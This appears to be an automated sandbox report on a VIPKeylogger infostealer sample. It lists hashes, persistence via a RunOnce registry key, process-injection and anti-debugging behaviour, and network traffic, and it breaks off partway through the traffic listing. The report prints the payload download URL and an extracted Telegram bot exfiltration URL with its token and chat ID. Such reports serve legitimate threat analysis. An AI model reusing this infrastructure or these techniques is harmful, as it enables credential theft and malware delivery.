Analysis
-
max time kernel
120s
max time network
120s
platform
windows7_x64
resource
win7-20240903-en
resource tags
arch:x64, arch:x86, image:win7-20240903-en, locale:en-us, os:windows7-x64, system
submitted
13/11/2024, 02:52 UTC
Static task
static1
Behavioral task
behavioral1
Sample
be0b05580938cea205cb3e035bf9f814327b30a59ea80bae55255530519d1fcd.exe
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
be0b05580938cea205cb3e035bf9f814327b30a59ea80bae55255530519d1fcd.exe
Resource
win10v2004-20241007-en
Behavioral task
behavioral3
Sample
$PLUGINSDIR/System.dll
Resource
win7-20240903-en
Behavioral task
behavioral4
Sample
$PLUGINSDIR/System.dll
Resource
win10v2004-20241007-en
General
-
Target
be0b05580938cea205cb3e035bf9f814327b30a59ea80bae55255530519d1fcd.exe
-
Size
814KB
-
MD5
4d05eac9c30331683fe59038aba0d873
-
SHA1
683812ee2e76037ac4cf1ad0858778fcea44bad6
-
SHA256
be0b05580938cea205cb3e035bf9f814327b30a59ea80bae55255530519d1fcd
-
SHA512
eb9f3cd33ee8fd311da446041450a62be3cdcae02c34fd01c2610355fa87795c77e2d0b8fc3208cbf699838f30a1160c6b1f81b20dd68c4fe2a2809ee5bae0a8
-
SSDEEP
24576:jvYV0HT73uFB1vuQoj5RvdulhTzGB/bNlVC7t:cOzaYQmZ5FNlVg
Malware Config
Extracted
vipkeylogger
https://api.telegram.org/bot8177184706:AAEJ0_bPTtjIc-PnjNdYNmARZ2fvBD17ZJI/sendMessage?chat_id=6198188190
Signatures
-
VIPKeylogger
VIPKeylogger is a keylogger and infostealer written in C#; it resembles SnakeKeylogger, which was first observed in 2020.
-
Vipkeylogger family
-
Loads dropped DLL 1 IoCs
pid | Process
1044 | be0b05580938cea205cb3e035bf9f814327b30a59ea80bae55255530519d1fcd.exe
-
Adds Run key to start application 2 TTPs 1 IoCs
description | ioc | Process
Set value (str) | \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Windows\CurrentVersion\RunOnce\Stavemaaden = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Milkhouse180\\Lgehjlp.exe" | be0b05580938cea205cb3e035bf9f814327b30a59ea80bae55255530519d1fcd.exe
-
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow | ioc
6 | checkip.dyndns.org
-
Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs
pid | Process
2640 | be0b05580938cea205cb3e035bf9f814327b30a59ea80bae55255530519d1fcd.exe
-
Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
pid | Process
1044 | be0b05580938cea205cb3e035bf9f814327b30a59ea80bae55255530519d1fcd.exe
2640 | be0b05580938cea205cb3e035bf9f814327b30a59ea80bae55255530519d1fcd.exe
-
Suspicious use of SetThreadContext 1 IoCs
description | pid | Process | procid_target
PID 1044 set thread context of 2640 | 1044 | be0b05580938cea205cb3e035bf9f814327b30a59ea80bae55255530519d1fcd.exe | 28
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 2 IoCs
Attempts to gather information about the system language of a victim host in order to infer its geographical location.
description | ioc | Process
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | be0b05580938cea205cb3e035bf9f814327b30a59ea80bae55255530519d1fcd.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | be0b05580938cea205cb3e035bf9f814327b30a59ea80bae55255530519d1fcd.exe
-
Suspicious behavior: EnumeratesProcesses 1 IoCs
pid | Process
2640 | be0b05580938cea205cb3e035bf9f814327b30a59ea80bae55255530519d1fcd.exe
-
Suspicious behavior: MapViewOfSection 1 IoCs
pid | Process
1044 | be0b05580938cea205cb3e035bf9f814327b30a59ea80bae55255530519d1fcd.exe
-
Suspicious use of AdjustPrivilegeToken 1 IoCs
description | pid | Process
Token: SeDebugPrivilege | 2640 | be0b05580938cea205cb3e035bf9f814327b30a59ea80bae55255530519d1fcd.exe
-
Suspicious use of WriteProcessMemory 6 IoCs
description | pid | Process | procid_target
PID 1044 wrote to memory of 2640 | 1044 | be0b05580938cea205cb3e035bf9f814327b30a59ea80bae55255530519d1fcd.exe | 28
PID 1044 wrote to memory of 2640 | 1044 | be0b05580938cea205cb3e035bf9f814327b30a59ea80bae55255530519d1fcd.exe | 28
PID 1044 wrote to memory of 2640 | 1044 | be0b05580938cea205cb3e035bf9f814327b30a59ea80bae55255530519d1fcd.exe | 28
PID 1044 wrote to memory of 2640 | 1044 | be0b05580938cea205cb3e035bf9f814327b30a59ea80bae55255530519d1fcd.exe | 28
PID 1044 wrote to memory of 2640 | 1044 | be0b05580938cea205cb3e035bf9f814327b30a59ea80bae55255530519d1fcd.exe | 28
PID 1044 wrote to memory of 2640 | 1044 | be0b05580938cea205cb3e035bf9f814327b30a59ea80bae55255530519d1fcd.exe | 28
Processes
-
Process: C:\Users\Admin\AppData\Local\Temp\be0b05580938cea205cb3e035bf9f814327b30a59ea80bae55255530519d1fcd.exe
Command line: "C:\Users\Admin\AppData\Local\Temp\be0b05580938cea205cb3e035bf9f814327b30a59ea80bae55255530519d1fcd.exe"
- Loads dropped DLL
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious behavior: MapViewOfSection
- Suspicious use of WriteProcessMemory
PID:1044
Child process: C:\Users\Admin\AppData\Local\Temp\be0b05580938cea205cb3e035bf9f814327b30a59ea80bae55255530519d1fcd.exe
Command line: "C:\Users\Admin\AppData\Local\Temp\be0b05580938cea205cb3e035bf9f814327b30a59ea80bae55255530519d1fcd.exe"
- Adds Run key to start application
- Suspicious use of NtCreateThreadExHideFromDebugger
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2640
-
Network
-
Remote address: 8.8.8.8:53
Request: mertvinc.com.tr IN A
Response: mertvinc.com.tr IN A 185.244.144.68
-
GET http://mertvinc.com.tr/fYJJzdXnGgCBdwfMZh209.bin
Process: be0b05580938cea205cb3e035bf9f814327b30a59ea80bae55255530519d1fcd.exe
Remote address: 185.244.144.68:80
Request:
GET /fYJJzdXnGgCBdwfMZh209.bin HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
Host: mertvinc.com.tr
Cache-Control: no-cache
Response:
HTTP/1.1 200 OK
Content-Type: application/octet-stream
Last-Modified: Mon, 11 Nov 2024 10:25:50 GMT
Etag: "43a40-6731dbae-e996a4157869782e;;;"
Accept-Ranges: bytes
Content-Length: 277056
Date: Wed, 13 Nov 2024 01:59:23 GMT
Server: LiteSpeed
X-Powered-By: PleskLin
-
Remote address: 8.8.8.8:53
Request: checkip.dyndns.org IN A
Response: checkip.dyndns.org IN CNAME checkip.dyndns.com
checkip.dyndns.com IN A 132.226.8.169
checkip.dyndns.com IN A 193.122.130.0
checkip.dyndns.com IN A 132.226.247.73
checkip.dyndns.com IN A 193.122.6.168
checkip.dyndns.com IN A 158.101.44.242
-
Remote address: 132.226.8.169:80
Request:
GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
Host: checkip.dyndns.org
Connection: Keep-Alive
Response:
HTTP/1.1 200 OK
Content-Type: text/html
Content-Length: 105
Connection: keep-alive
Cache-Control: no-cache
Pragma: no-cache
-
Remote address: 132.226.8.169:80
Request:
GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
Host: checkip.dyndns.org
Response:
HTTP/1.1 200 OK
Content-Type: text/html
Content-Length: 105
Connection: keep-alive
Cache-Control: no-cache
Pragma: no-cache
-
Remote address: 132.226.8.169:80
Request:
GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
Host: checkip.dyndns.org
Response:
HTTP/1.1 200 OK
Content-Type: text/html
Content-Length: 105
Connection: keep-alive
Cache-Control: no-cache
Pragma: no-cache
-
Remote address: 132.226.8.169:80
Request:
GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
Host: checkip.dyndns.org
Response:
HTTP/1.1 200 OK
Content-Type: text/html
Content-Length: 105
Connection: keep-alive
Cache-Control: no-cache
Pragma: no-cache
-
Remote address: 132.226.8.169:80
Request:
GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
Host: checkip.dyndns.org
Response:
HTTP/1.1 200 OK
Content-Type: text/html
Content-Length: 105
Connection: keep-alive
Cache-Control: no-cache
Pragma: no-cache
-
Remote address: 132.226.8.169:80
Request:
GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
Host: checkip.dyndns.org
Response:
HTTP/1.1 200 OK
Content-Type: text/html
Content-Length: 105
Connection: keep-alive
Cache-Control: no-cache
Pragma: no-cache
-
Remote address: 132.226.8.169:80
Request:
GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
Host: checkip.dyndns.org
Response:
HTTP/1.1 200 OK
Content-Type: text/html
Content-Length: 105
Connection: keep-alive
Cache-Control: no-cache
Pragma: no-cache
-
Remote address: 132.226.8.169:80
Request:
GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
Host: checkip.dyndns.org
Response:
HTTP/1.1 200 OK
Content-Type: text/html
Content-Length: 105
Connection: keep-alive
Cache-Control: no-cache
Pragma: no-cache
-
Remote address: 132.226.8.169:80
Request:
GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
Host: checkip.dyndns.org
Response:
HTTP/1.1 200 OK
Content-Type: text/html
Content-Length: 105
Connection: keep-alive
Cache-Control: no-cache
Pragma: no-cache
-
Remote address: 132.226.8.169:80
Request:
GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
Host: checkip.dyndns.org
Response:
HTTP/1.1 200 OK
Content-Type: text/html
Content-Length: 105
Connection: keep-alive
Cache-Control: no-cache
Pragma: no-cache
-
Remote address: 8.8.8.8:53
Request: reallyfreegeoip.org IN A
Response: reallyfreegeoip.org IN A 172.67.177.134
reallyfreegeoip.org IN A 104.21.67.152
-
GET https://reallyfreegeoip.org/xml/138.199.29.44
Process: be0b05580938cea205cb3e035bf9f814327b30a59ea80bae55255530519d1fcd.exe
Remote address: 172.67.177.134:443
Request:
GET /xml/138.199.29.44 HTTP/1.1
Host: reallyfreegeoip.org
Connection: Keep-Alive
Response:
HTTP/1.1 200 OK
Content-Type: text/xml
Content-Length: 355
Connection: keep-alive
x-amzn-requestid: c54d806c-7605-448e-80e2-6c5b4ba1b222
x-amzn-trace-id: Root=1-67267872-3f046eed4af0d7872d2af9fc;Parent=5d4ccd5213ddb57b;Sampled=0;Lineage=1:fc9e8231:0
x-cache: Miss from cloudfront
via: 1.1 06b0ae3f7e31c86dd483b6af7dc0cc98.cloudfront.net (CloudFront)
x-amz-cf-pop: LHR50-P7
x-amz-cf-id: vmGpTMjh2U9YM4dibCuMaq8D7e4Ik8lBQYv4IPqsjxVb1ki0W-5QVA==
Cache-Control: max-age=31536000
CF-Cache-Status: HIT
Age: 891909
Last-Modified: Sat, 02 Nov 2024 19:07:30 GMT
Accept-Ranges: bytes
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=MHwOjiu%2ByUzpeX9DNBXP0Jx01699%2FfLn1ZWrxqhUJg46zPZCotJiQ7r2zRD6ZxRK0xlHUf9t%2FpgCTzPIPyOAB6BAWcor6qDaJC2QFPf7gYTVCI6PzTOZ8oZ4oS%2B7RkOu7JfBR4Tj"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8e1b778a4e4d6433-LHR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=48449&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2866&recv_bytes=374&delivery_rate=83100&cwnd=253&unsent_bytes=0&cid=4aaa367f64fc9074&ts=155&x=0"
-
GET https://reallyfreegeoip.org/xml/138.199.29.44
Process: be0b05580938cea205cb3e035bf9f814327b30a59ea80bae55255530519d1fcd.exe
Remote address: 172.67.177.134:443
Request:
GET /xml/138.199.29.44 HTTP/1.1
Host: reallyfreegeoip.org
Response:
HTTP/1.1 200 OK
Content-Type: text/xml
Content-Length: 355
Connection: keep-alive
x-amzn-requestid: c54d806c-7605-448e-80e2-6c5b4ba1b222
x-amzn-trace-id: Root=1-67267872-3f046eed4af0d7872d2af9fc;Parent=5d4ccd5213ddb57b;Sampled=0;Lineage=1:fc9e8231:0
x-cache: Miss from cloudfront
via: 1.1 06b0ae3f7e31c86dd483b6af7dc0cc98.cloudfront.net (CloudFront)
x-amz-cf-pop: LHR50-P7
x-amz-cf-id: vmGpTMjh2U9YM4dibCuMaq8D7e4Ik8lBQYv4IPqsjxVb1ki0W-5QVA==
Cache-Control: max-age=31536000
CF-Cache-Status: HIT
Age: 891909
Last-Modified: Sat, 02 Nov 2024 19:07:30 GMT
Accept-Ranges: bytes
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ChhhODAG8ovGPb1nhe%2Fw8BrFgDQiGUsqgqRwFfpPSH89Ncul0%2BcQbvdrRI1v6xFAX3DiJ8dHutDvoLvUPYLhSArYBf8%2F%2BS7ldqNGxafADkIygNgc7Ms0E%2F3%2B%2FLhXKDaZDT2c9sx%2F"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8e1b778c7f976433-LHR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=72944&sent=8&recv=9&lost=0&retrans=0&sent_bytes=4508&recv_bytes=475&delivery_rate=83100&cwnd=256&unsent_bytes=0&cid=4aaa367f64fc9074&ts=509&x=0"
-
GET https://reallyfreegeoip.org/xml/138.199.29.44
Process: be0b05580938cea205cb3e035bf9f814327b30a59ea80bae55255530519d1fcd.exe
Remote address: 172.67.177.134:443
Request:
GET /xml/138.199.29.44 HTTP/1.1
Host: reallyfreegeoip.org
Response:
HTTP/1.1 200 OK
Content-Type: text/xml
Content-Length: 355
Connection: keep-alive
x-amzn-requestid: c54d806c-7605-448e-80e2-6c5b4ba1b222
x-amzn-trace-id: Root=1-67267872-3f046eed4af0d7872d2af9fc;Parent=5d4ccd5213ddb57b;Sampled=0;Lineage=1:fc9e8231:0
x-cache: Miss from cloudfront
via: 1.1 06b0ae3f7e31c86dd483b6af7dc0cc98.cloudfront.net (CloudFront)
x-amz-cf-pop: LHR50-P7
x-amz-cf-id: vmGpTMjh2U9YM4dibCuMaq8D7e4Ik8lBQYv4IPqsjxVb1ki0W-5QVA==
Cache-Control: max-age=31536000
CF-Cache-Status: HIT
Age: 891910
Last-Modified: Sat, 02 Nov 2024 19:07:30 GMT
Accept-Ranges: bytes
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=NIBGjLtbVU8P6K5LmZXH1aOKG3XwKdV7zBlbX9q8gslTId%2BRvTRNeHpT4OBSdB8FBi5YG5jSBPgrQpVuUP6AfEWGoSJwR8ABWl%2FGmSzpLQVyPPs6UYx1yAwCP8ICfFYYMEHTEFfK"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8e1b778eb90f6433-LHR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=92266&sent=11&recv=12&lost=0&retrans=0&sent_bytes=6150&recv_bytes=576&delivery_rate=83100&cwnd=256&unsent_bytes=0&cid=4aaa367f64fc9074&ts=872&x=0"
-
GET https://reallyfreegeoip.org/xml/138.199.29.44
Process: be0b05580938cea205cb3e035bf9f814327b30a59ea80bae55255530519d1fcd.exe
Remote address: 172.67.177.134:443
Request:
GET /xml/138.199.29.44 HTTP/1.1
Host: reallyfreegeoip.org
Response:
HTTP/1.1 200 OK
Content-Type: text/xml
Content-Length: 355
Connection: keep-alive
x-amzn-requestid: c54d806c-7605-448e-80e2-6c5b4ba1b222
x-amzn-trace-id: Root=1-67267872-3f046eed4af0d7872d2af9fc;Parent=5d4ccd5213ddb57b;Sampled=0;Lineage=1:fc9e8231:0
x-cache: Miss from cloudfront
via: 1.1 06b0ae3f7e31c86dd483b6af7dc0cc98.cloudfront.net (CloudFront)
x-amz-cf-pop: LHR50-P7
x-amz-cf-id: vmGpTMjh2U9YM4dibCuMaq8D7e4Ik8lBQYv4IPqsjxVb1ki0W-5QVA==
Cache-Control: max-age=31536000
CF-Cache-Status: HIT
Age: 891910
Last-Modified: Sat, 02 Nov 2024 19:07:30 GMT
Accept-Ranges: bytes
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=V%2BVz3F7UvxMgMXrlnB9FZmRO2y0f481xoe2pClrS5tqZ6Hn2yrRjClIn1LyeFGaNQzQtdikWlk0uEoGDQJ4gRWEOBxDPiECLGmZr2RvhU5G1Yniys0R2NvyQZp%2BFyAntf5pOvu%2F%2B"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8e1b77911a536433-LHR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=106505&sent=14&recv=15&lost=0&retrans=0&sent_bytes=7792&recv_bytes=677&delivery_rate=83100&cwnd=256&unsent_bytes=0&cid=4aaa367f64fc9074&ts=1241&x=0"
-
GET https://reallyfreegeoip.org/xml/138.199.29.44
Process: be0b05580938cea205cb3e035bf9f814327b30a59ea80bae55255530519d1fcd.exe
Remote address: 172.67.177.134:443
Request:
GET /xml/138.199.29.44 HTTP/1.1
Host: reallyfreegeoip.org
Response:
HTTP/1.1 200 OK
Content-Type: text/xml
Content-Length: 355
Connection: keep-alive
x-amzn-requestid: c54d806c-7605-448e-80e2-6c5b4ba1b222
x-amzn-trace-id: Root=1-67267872-3f046eed4af0d7872d2af9fc;Parent=5d4ccd5213ddb57b;Sampled=0;Lineage=1:fc9e8231:0
x-cache: Miss from cloudfront
via: 1.1 06b0ae3f7e31c86dd483b6af7dc0cc98.cloudfront.net (CloudFront)
x-amz-cf-pop: LHR50-P7
x-amz-cf-id: vmGpTMjh2U9YM4dibCuMaq8D7e4Ik8lBQYv4IPqsjxVb1ki0W-5QVA==
Cache-Control: max-age=31536000
CF-Cache-Status: HIT
Age: 891910
Last-Modified: Sat, 02 Nov 2024 19:07:30 GMT
Accept-Ranges: bytes
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=jLPGD5wfwosun6WRJrnWWXUo2vfpruUGXw4Quy8bl6YrQHTbu5V3xLRpffjTbgr3%2BC9HbWNqtUxcSqf8MItG%2BtoWO2oUbL1FKVAEqNoXj%2B8qZRMUqD2hAJDlWKJGjGG1E3o8SQCJ"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8e1b77932ba66433-LHR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=116196&sent=17&recv=18&lost=0&retrans=0&sent_bytes=9434&recv_bytes=778&delivery_rate=83100&cwnd=256&unsent_bytes=0&cid=4aaa367f64fc9074&ts=1572&x=0"
-
GET https://reallyfreegeoip.org/xml/138.199.29.44
Process: be0b05580938cea205cb3e035bf9f814327b30a59ea80bae55255530519d1fcd.exe
Remote address: 172.67.177.134:443
Request:
GET /xml/138.199.29.44 HTTP/1.1
Host: reallyfreegeoip.org
Response:
HTTP/1.1 200 OK
Content-Type: text/xml
Content-Length: 355
Connection: keep-alive
x-amzn-requestid: c54d806c-7605-448e-80e2-6c5b4ba1b222
x-amzn-trace-id: Root=1-67267872-3f046eed4af0d7872d2af9fc;Parent=5d4ccd5213ddb57b;Sampled=0;Lineage=1:fc9e8231:0
x-cache: Miss from cloudfront
via: 1.1 06b0ae3f7e31c86dd483b6af7dc0cc98.cloudfront.net (CloudFront)
x-amz-cf-pop: LHR50-P7
x-amz-cf-id: vmGpTMjh2U9YM4dibCuMaq8D7e4Ik8lBQYv4IPqsjxVb1ki0W-5QVA==
Cache-Control: max-age=31536000
CF-Cache-Status: HIT
Age: 891911
Last-Modified: Sat, 02 Nov 2024 19:07:30 GMT
Accept-Ranges: bytes
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=eRPtL88rpURRG3u9Zjdw98NEwI6At7R4QWwEFFtsP748O3DB8CpXBPZwTtCI0onnbfxh9CzVy1eQJS82QmV5ofd%2BpE0rL6RvhCVZXtZWXKhf60tyzMUFDAbLJPVLG3f9SX%2B2o5Qb"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8e1b77954cfe6433-LHR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=123197&sent=20&recv=21&lost=0&retrans=0&sent_bytes=11076&recv_bytes=879&delivery_rate=83100&cwnd=256&unsent_bytes=0&cid=4aaa367f64fc9074&ts=1918&x=0"
-
GET https://reallyfreegeoip.org/xml/138.199.29.44
Process: be0b05580938cea205cb3e035bf9f814327b30a59ea80bae55255530519d1fcd.exe
Remote address: 172.67.177.134:443
Request:
GET /xml/138.199.29.44 HTTP/1.1
Host: reallyfreegeoip.org
Response:
HTTP/1.1 200 OK
Content-Type: text/xml
Content-Length: 355
Connection: keep-alive
x-amzn-requestid: c54d806c-7605-448e-80e2-6c5b4ba1b222
x-amzn-trace-id: Root=1-67267872-3f046eed4af0d7872d2af9fc;Parent=5d4ccd5213ddb57b;Sampled=0;Lineage=1:fc9e8231:0
x-cache: Miss from cloudfront
via: 1.1 06b0ae3f7e31c86dd483b6af7dc0cc98.cloudfront.net (CloudFront)
x-amz-cf-pop: LHR50-P7
x-amz-cf-id: vmGpTMjh2U9YM4dibCuMaq8D7e4Ik8lBQYv4IPqsjxVb1ki0W-5QVA==
Cache-Control: max-age=31536000
CF-Cache-Status: HIT
Age: 891911
Last-Modified: Sat, 02 Nov 2024 19:07:30 GMT
Accept-Ranges: bytes
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=erjS2mj522vZZEoy3D7kMKLCRqmrp8yUUIul5HFypvgjTseJD%2F7YdhbX9qFDjWk6GRlfnXobfhDVrq8x0cXl73DCGHgoYm25NPB0TKEzJJWqrubvkLf0v7Fwg1jbdwD2CZJcGot8"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8e1b77977ed26433-LHR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=130222&sent=23&recv=24&lost=0&retrans=0&sent_bytes=12718&recv_bytes=980&delivery_rate=83100&cwnd=256&unsent_bytes=0&cid=4aaa367f64fc9074&ts=2266&x=0"
-
GET https://reallyfreegeoip.org/xml/138.199.29.44
Process: be0b05580938cea205cb3e035bf9f814327b30a59ea80bae55255530519d1fcd.exe
Remote address: 172.67.177.134:443
Request:
GET /xml/138.199.29.44 HTTP/1.1
Host: reallyfreegeoip.org
Response:
HTTP/1.1 200 OK
Content-Type: text/xml
Content-Length: 355
Connection: keep-alive
x-amzn-requestid: c54d806c-7605-448e-80e2-6c5b4ba1b222
x-amzn-trace-id: Root=1-67267872-3f046eed4af0d7872d2af9fc;Parent=5d4ccd5213ddb57b;Sampled=0;Lineage=1:fc9e8231:0
x-cache: Miss from cloudfront
via: 1.1 06b0ae3f7e31c86dd483b6af7dc0cc98.cloudfront.net (CloudFront)
x-amz-cf-pop: LHR50-P7
x-amz-cf-id: vmGpTMjh2U9YM4dibCuMaq8D7e4Ik8lBQYv4IPqsjxVb1ki0W-5QVA==
Cache-Control: max-age=31536000
CF-Cache-Status: HIT
Age: 891911
Last-Modified: Sat, 02 Nov 2024 19:07:30 GMT
Accept-Ranges: bytes
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=XMETGe8%2F3c8csslwSpUEj%2BNpIbKzmMXBMlDSLzX7%2Bcb5eAN0AMaIZeA7I8OL25VHjtrLuFwIT%2F2MEKaj1h%2BEKO6TBMXuKliC%2B0AN%2BWmLya4i5DLY5y8U%2B53xkqHl%2BxhJfNBE3dK8"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8e1b7799a81d6433-LHR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=134936&sent=26&recv=27&lost=0&retrans=0&sent_bytes=14360&recv_bytes=1081&delivery_rate=83100&cwnd=256&unsent_bytes=0&cid=4aaa367f64fc9074&ts=2621&x=0"
-
GET https://reallyfreegeoip.org/xml/138.199.29.44
Process: be0b05580938cea205cb3e035bf9f814327b30a59ea80bae55255530519d1fcd.exe
Remote address: 172.67.177.134:443
Request:
GET /xml/138.199.29.44 HTTP/1.1
Host: reallyfreegeoip.org
Response:
HTTP/1.1 200 OK
Content-Type: text/xml
Content-Length: 355
Connection: keep-alive
x-amzn-requestid: c54d806c-7605-448e-80e2-6c5b4ba1b222
x-amzn-trace-id: Root=1-67267872-3f046eed4af0d7872d2af9fc;Parent=5d4ccd5213ddb57b;Sampled=0;Lineage=1:fc9e8231:0
x-cache: Miss from cloudfront
via: 1.1 06b0ae3f7e31c86dd483b6af7dc0cc98.cloudfront.net (CloudFront)
x-amz-cf-pop: LHR50-P7
x-amz-cf-id: vmGpTMjh2U9YM4dibCuMaq8D7e4Ik8lBQYv4IPqsjxVb1ki0W-5QVA==
Cache-Control: max-age=31536000
CF-Cache-Status: HIT
Age: 891912
Last-Modified: Sat, 02 Nov 2024 19:07:30 GMT
Accept-Ranges: bytes
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=r9LzcBasEv84Kqc%2BfzUcZ%2BV0EgrAwAJde6nM%2BuKnuXdnXBOwNGd7oqVu2PJFw8dd4ZR78mdROc5LWCCejT4wHAQ7cIzl9CmL9a9%2BaQDndc7WPmiTKs%2FgQDZYR5wRVCtMyPJRd8Wz"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8e1b779be9c66433-LHR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=138975&sent=29&recv=30&lost=0&retrans=0&sent_bytes=16018&recv_bytes=1182&delivery_rate=83100&cwnd=256&unsent_bytes=0&cid=4aaa367f64fc9074&ts=2972&x=0"
-
Remote address: 8.8.8.8:53
Request: api.telegram.org IN A
Response: api.telegram.org IN A 149.154.167.220
-
Destination: 185.244.144.68:80
URL: http://mertvinc.com.tr/fYJJzdXnGgCBdwfMZh209.bin
Protocol: http
Process: be0b05580938cea205cb3e035bf9f814327b30a59ea80bae55255530519d1fcd.exe
Traffic: 6.7kB sent, 285.7kB received, 135 packets sent, 209 packets received
HTTP Request
GET http://mertvinc.com.tr/fYJJzdXnGgCBdwfMZh209.bin
HTTP Response
200
-
Destination: 132.226.8.169:80
URL: http://checkip.dyndns.org/
Protocol: http
Process: be0b05580938cea205cb3e035bf9f814327b30a59ea80bae55255530519d1fcd.exe
Traffic: 1.9kB sent, 3.4kB received, 15 packets sent, 15 packets received
HTTP Request
GET http://checkip.dyndns.org/
HTTP Response
200
HTTP Request
GET http://checkip.dyndns.org/
HTTP Response
200
HTTP Request
GET http://checkip.dyndns.org/
HTTP Response
200
HTTP Request
GET http://checkip.dyndns.org/
HTTP Response
200
HTTP Request
GET http://checkip.dyndns.org/
HTTP Response
200
HTTP Request
GET http://checkip.dyndns.org/
HTTP Response
200
HTTP Request
GET http://checkip.dyndns.org/
HTTP Response
200
HTTP Request
GET http://checkip.dyndns.org/
HTTP Response
200
HTTP Request
GET http://checkip.dyndns.org/
HTTP Response
200
HTTP Request
GET http://checkip.dyndns.org/
HTTP Response
200
-
Destination: 172.67.177.134:443
URL: https://reallyfreegeoip.org/xml/138.199.29.44
Protocol: tls, http
Process: be0b05580938cea205cb3e035bf9f814327b30a59ea80bae55255530519d1fcd.exe
Traffic: 2.6kB sent, 19.0kB received, 33 packets sent, 33 packets received
HTTP Request
GET https://reallyfreegeoip.org/xml/138.199.29.44
HTTP Response
200
HTTP Request
GET https://reallyfreegeoip.org/xml/138.199.29.44
HTTP Response
200
HTTP Request
GET https://reallyfreegeoip.org/xml/138.199.29.44
HTTP Response
200
HTTP Request
GET https://reallyfreegeoip.org/xml/138.199.29.44
HTTP Response
200
HTTP Request
GET https://reallyfreegeoip.org/xml/138.199.29.44
HTTP Response
200
HTTP Request
